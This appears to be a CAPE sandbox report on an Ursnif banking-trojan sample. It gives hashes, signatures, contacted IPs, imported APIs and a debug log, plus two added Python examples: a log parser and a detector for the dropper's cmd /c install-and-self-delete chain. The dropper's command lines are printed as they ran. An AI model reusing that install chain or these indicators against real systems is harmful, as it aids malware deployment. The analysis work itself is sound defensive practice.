2020-03-24 09:50:27,246 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:50:27,246 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860279e+00.
2020-03-24 09:50:27,263 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF900000.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:50:27,263 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6DA0000.
2020-03-24 09:50:27,263 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6120000.
2020-03-24 09:50:27,279 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF57F0000.
2020-03-24 09:50:27,279 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF5580000.
2020-03-24 09:50:27,293 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF4220000.
2020-03-24 09:50:27,293 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF3690000.
2020-03-24 09:50:27,293 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2936.
2020-03-24 09:50:27,293 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2548.
2020-03-24 09:50:27,293 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2216.
2020-03-24 09:50:27,293 [lib.api.process] INFO: Termination confirmed for process 1632
2020-03-24 09:50:27,309 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1632
2020-03-24 09:50:27,309 [root] INFO: Terminate event set for process 1632.
2020-03-24 09:50:27,309 [root] INFO: Terminating process 1632 before shutdown.
2020-03-24 09:50:27,309 [root] INFO: Waiting for process 1632 to exit.
2020-03-24 09:50:27,325 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_182481664036361324232020
2020-03-24 09:50:28,311 [root] INFO: Shutting down package.
2020-03-24 09:50:28,311 [root] INFO: Stopping auxiliary modules.
2020-03-24 09:50:28,311 [root] INFO: Finishing auxiliary modules.
2020-03-24 09:50:28,311 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 09:50:28,311 [root] WARNING: File at path "C:\aWpAMaeYY\debugger" does not exist, skip.
2020-03-24 09:50:28,321 [root] INFO: Analysis completed.
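Three extraction events in the log above have the same shape: a protection change to 0x40 (PAGE_EXECUTE_READWRITE) on a tracked region, a scan of that region for PE headers, and a dump whose path and size are logged; a fourth dump, of the main image at 0xFF900000, is triggered by the analysis timeout rather than by a protection change. The Python below is an added example, not CAPE tooling: it reconstructs those events from the debug lines so that each file under C:\aWpAMaeYY\CAPE can be tied to the region, entry point and protection change that produced it. The embedded excerpt is a verbatim subset of the log above; the protection-constant names are the winnt.h values.

```python
import re

# Verbatim subset of the CAPE debug log above (the lines this parser keys on).
CAPE_LOG = r"""
2020-03-24 09:48:03,227 [root] DEBUG: AddTrackedRegion: EntryPoint 0x197c, Entropy 6.293267e+00
2020-03-24 09:48:03,227 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF42BA5B8 (alloc base 0x000007FEF4220000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:03,227 [root] DEBUG: DumpPEsInRange: Scanning range 0xf4220000 - 0xf42ba5c0.
2020-03-24 09:48:03,243 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000197C.
2020-03-24 09:48:03,259 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1688183748348924232020
2020-03-24 09:48:03,275 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x137800.
2020-03-24 09:48:03,275 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF4220000.
2020-03-24 09:48:03,289 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF42E0A9E (alloc base 0x000007FEF4220000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x40
2020-03-24 09:48:03,289 [root] DEBUG: DumpPEsInRange: Scanning range 0xf4220000 - 0xf42e0aac.
2020-03-24 09:48:03,305 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000197C.
2020-03-24 09:48:03,336 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_2121545002348924232020
2020-03-24 09:48:03,336 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x137800.
2020-03-24 09:48:03,352 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF4220000.
2020-03-24 09:48:11,246 [root] DEBUG: AddTrackedRegion: EntryPoint 0x1010, Entropy 6.087271e+00
2020-03-24 09:48:11,246 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF37AA030 (alloc base 0x000007FEF3690000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:11,246 [root] DEBUG: DumpPEsInRange: Scanning range 0xf3690000 - 0xf37aa038.
2020-03-24 09:48:11,262 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001010.
2020-03-24 09:48:11,278 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_6819044761148924232020
2020-03-24 09:48:11,292 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x141800.
2020-03-24 09:48:11,292 [root] DEBUG: TestPERequirements: Possible PE image rejected due to section 1 of 1673, RVA 0xcd8b4920 and size 0x568dc68b.
2020-03-24 09:48:11,292 [root] DEBUG: TestPERequirements: Possible PE image rejected due to section 1 of 17, RVA 0x30b19 and size 0xffef8.
2020-03-24 09:48:11,292 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF3690000.
2020-03-24 09:50:26,233 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-03-24 09:50:27,246 [root] DEBUG: DumpPEsInRange: Scanning range 0xff900000 - 0xff9b9568.
2020-03-24 09:50:27,263 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2020-03-24 09:50:27,325 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_182481664036361324232020
"""

HEX = r"(0x[0-9A-Fa-f]+)"
RE_LINE = re.compile(r"^\S+ \S+ \[[^\]]+\] \w+: (.*)$")
RE_TRACK = re.compile(r"AddTrackedRegion: EntryPoint " + HEX + r", Entropy (\S+)")
RE_PROT = re.compile(r"ProtectionHandler: Address: " + HEX + r" \(alloc base " + HEX
                     + r"\), NumberOfBytesToProtect: " + HEX + r", NewAccessProtection: " + HEX)
RE_SCAN = re.compile(r"DumpPEsInRange: Scanning range " + HEX + r" - " + HEX)
RE_EP = re.compile(r"DumpProcess: Module entry point VA is " + HEX)
RE_FILE = re.compile(r"Added new CAPE file to list with path: (\S+)")
RE_SIZE = re.compile(r"DumpProcess: Module image dump success - dump size " + HEX)
RE_REJECT = re.compile(r"TestPERequirements: Possible PE image rejected due to (.+)\.$")
RE_DONE = re.compile(r"ProtectionHandler: PE image\(s\) dumped from " + HEX)

# Memory-protection constants from winnt.h; 0x40 is the one every event in the log reports.
PROTECTION_NAMES = {0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def parse_cape_dumps(lines):
    """Group the per-line debug output into one record per dumped image."""
    events, cur, pending = [], None, {}
    for line in lines:
        m = RE_LINE.match(line)
        if not m:
            continue
        msg = m.group(1)
        if (t := RE_TRACK.match(msg)):
            # A region was first tracked here; keep its EP/entropy for the event that follows.
            pending = {"entry_point": int(t[1], 16), "entropy": float(t[2])}
        elif (t := RE_PROT.match(msg)):
            prot = int(t[4], 16)
            cur = {"trigger": "protection_change", "address": int(t[1], 16),
                   "base": int(t[2], 16), "bytes": int(t[3], 16),
                   "protection": PROTECTION_NAMES.get(prot, hex(prot)),
                   "rejected": [], **pending}
            pending = {}
        elif (t := RE_SCAN.match(msg)):
            if cur is None:
                # No protection change opened this scan: the shutdown dump of the main image.
                cur = {"trigger": "shutdown", "base": int(t[1], 16), "rejected": []}
            # DumpPEsInRange prints only the low 32 bits of each address (0xf4220000 for
            # 0x000007FEF4220000), so the range is kept separately from the full base.
            cur["scan_range"] = (int(t[1], 16), int(t[2], 16))
        elif cur is None:
            continue
        elif (t := RE_EP.match(msg)):
            # Printed as "VA" but relative to the base, as the values in the log show.
            cur["entry_point"] = int(t[1], 16)
        elif (t := RE_FILE.match(msg)):
            cur["dump_path"] = t[1]
        elif (t := RE_SIZE.match(msg)):
            cur["dump_size"] = int(t[1], 16)
        elif (t := RE_REJECT.match(msg)):
            cur["rejected"].append(t[1])
        elif (t := RE_DONE.match(msg)):
            cur["base"] = int(t[1], 16)
            events.append(cur)
            cur = None
    if cur is not None and "dump_path" in cur:   # process killed before the closing line
        events.append(cur)
    return events


DUMPS = parse_cape_dumps(CAPE_LOG.strip().splitlines())

if __name__ == "__main__":
    for e in DUMPS:
        print(f"{e['trigger']:17} base={e['base']:#x} ep={e.get('entry_point', 0):#x} "
              f"size={e.get('dump_size', 0):#x} prot={e.get('protection', '-')} "
              f"rejected={len(e['rejected'])} -> {e.get('dump_path')}")
```

Two of the four records share the same base (0x000007FEF4220000) and the same dump size, which is the log's way of saying the region at that base was re-dumped when a second protection change enlarged it; the record for 0xFF900000 carries no dump size because the process was terminated before the "dump success" line could be written.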

MalScore

10.0

Ursnif

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2020-03-24 09:47:00 2020-03-24 09:50:55

File Details

File Name ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
SHA512 40f2880784f086494f19109aa0ca196fe4d0b5764ee17da8d2227582693ea9097b9e977faa1e62288b6bc0f56f813672150915b018b14a21b7014df3a9aaee6a
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
TrID
  • 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.3% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution
command: cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 0 triggered the Yara rule 'embedded_win_api'
Hit: PID 420 triggered the Yara rule 'vmdetect'
Hit: PID 1632 triggered the Yara rule 'Ursnif'
Possible date expiration check, exits too soon after checking local time
process: LjejZswGjULF7Ng.exe, PID 420
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\E502\D8E1.bat
DeletedFile: C:\Users\user\AppData\Local\Temp\LjejZswGjULF7Ng.exe
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab5CB0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar5CB1.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab5D2F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar5D30.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab658A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar658B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab767D.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar767E.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab78C0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar78C1.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9A5B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9A5C.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9FD9.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9FDA.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA01A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA01B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA20F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA210.tmp
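The two cmd /C command lines reported above and the deletions of D8E1.bat and of the original LjejZswGjULF7Ng.exe form one install-and-clean-up chain: cmd runs a batch file from the user's Temp directory with the relocated copy under AppData\Roaming and the original dropper (in 8.3 form, LJEJZS~1.EXE) as its arguments, after which both the batch file and the dropper are gone. The Python below is an added example of detection logic for that chain, not CAPE's signature code: it correlates process-creation events with subsequent file deletions. The event stream is constructed from the report's command lines and deleted paths with invented timestamps and PIDs, the cmd.exe image path is assumed (the report shows only "cmd"), and 8.3 short names are not resolved; the rule instead treats deletion of any .exe under Temp within the window as the dropper being removed.

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    ts: float
    kind: str                 # "process" (creation) or "file_delete"
    pid: int
    image: str = ""           # process image path
    cmdline: str = ""         # process command line
    path: str = ""            # deleted file path


# Paths as they appear in the report: batch file under %LOCALAPPDATA%\Temp, payload under %APPDATA%.
TEMP_BAT = re.compile(r'([A-Za-z]:\\Users\\[^\\"]+\\AppData\\Local\\Temp\\[^"]+?\.bat)', re.I)
ROAMING_EXE = re.compile(r'([A-Za-z]:\\Users\\[^\\"]+\\AppData\\Roaming\\[^"]+?\.exe)', re.I)
CMD_SWITCH = re.compile(r'(^|\s)/[cCrR](\s|$)')


def is_cmd_terminating(ev):
    """cmd.exe invoked with /C or /R: the shell exits as soon as the command finishes."""
    return (ev.kind == "process" and ev.image.lower().endswith("\\cmd.exe")
            and CMD_SWITCH.search(ev.cmdline) is not None)


def detect_install_chain(events, window=60.0):
    """Stage 1 (batch_launch): cmd /C runs a .bat from Temp whose arguments name an .exe
    under Roaming. Stage 2 (self_delete): within `window` seconds the .bat and an .exe in
    Temp are deleted, i.e. the original dropper was removed after relocating itself."""
    events = sorted(events, key=lambda e: e.ts)
    alerts = []
    for i, ev in enumerate(events):
        if not is_cmd_terminating(ev):
            continue
        bat, exe = TEMP_BAT.search(ev.cmdline), ROAMING_EXE.search(ev.cmdline)
        if not (bat and exe):
            continue
        alert = {"pid": ev.pid, "bat": bat[1], "payload": exe[1],
                 "stage": "batch_launch", "deleted": []}
        for later in events[i + 1:]:
            if later.ts - ev.ts > window:
                break
            if later.kind != "file_delete":
                continue
            p = later.path.lower()
            if p == bat[1].lower() or (p.endswith(".exe") and "\\appdata\\local\\temp\\" in p):
                alert["deleted"].append(later.path)
        got_bat = any(d.lower() == bat[1].lower() for d in alert["deleted"])
        got_exe = any(d.lower().endswith(".exe") for d in alert["deleted"])
        if got_bat and got_exe:
            alert["stage"] = "self_delete"
        alerts.append(alert)
    return alerts


CMD = r"C:\Windows\System32\cmd.exe"          # assumed image path
TEMP = r"C:\Users\user\AppData\Local\Temp"

# Constructed event stream: command lines and deleted paths taken from the report,
# timestamps and PIDs invented; the .tmp deletion and the ipconfig call are benign noise.
SAMPLE_EVENTS = [
    Event(0.0, "process", 2104, CMD,
          r'cmd /c ""C:\Users\user\AppData\Local\Temp\E502\D8E1.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""'),
    Event(0.8, "process", 2260, CMD,
          r'cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\LJEJZS~1.EXE""'),
    Event(1.5, "file_delete", 2260, path=TEMP + r"\Cab5CB0.tmp"),
    Event(2.0, "file_delete", 2260, path=TEMP + r"\E502\D8E1.bat"),
    Event(2.4, "file_delete", 2260, path=TEMP + r"\LjejZswGjULF7Ng.exe"),
    Event(30.0, "process", 3012, CMD, r"cmd /c ipconfig /all"),
]

if __name__ == "__main__":
    for a in detect_install_chain(SAMPLE_EVENTS):
        print(f"pid {a['pid']}: {a['stage']} payload={a['payload']} deleted={a['deleted']}")
```

The second cmd /C line (payload started with the dropper path as argument, no batch file) is deliberately not a hit on its own; it is the batch launch plus the follow-up deletions that make the chain distinctive, and keying on the batch file keeps ordinary cmd /c usage such as the ipconfig call out of the alert set.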
Attempts to connect to a dead IP:Port (5 unique times)
IP: 152.195.11.6:80 (United States)
IP: 23.202.161.73:80 (United States)
IP: 185.85.0.29:443 (Germany)
IP: 192.42.116.41:80 (Netherlands)
IP: 185.85.0.29:80 (Germany)
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
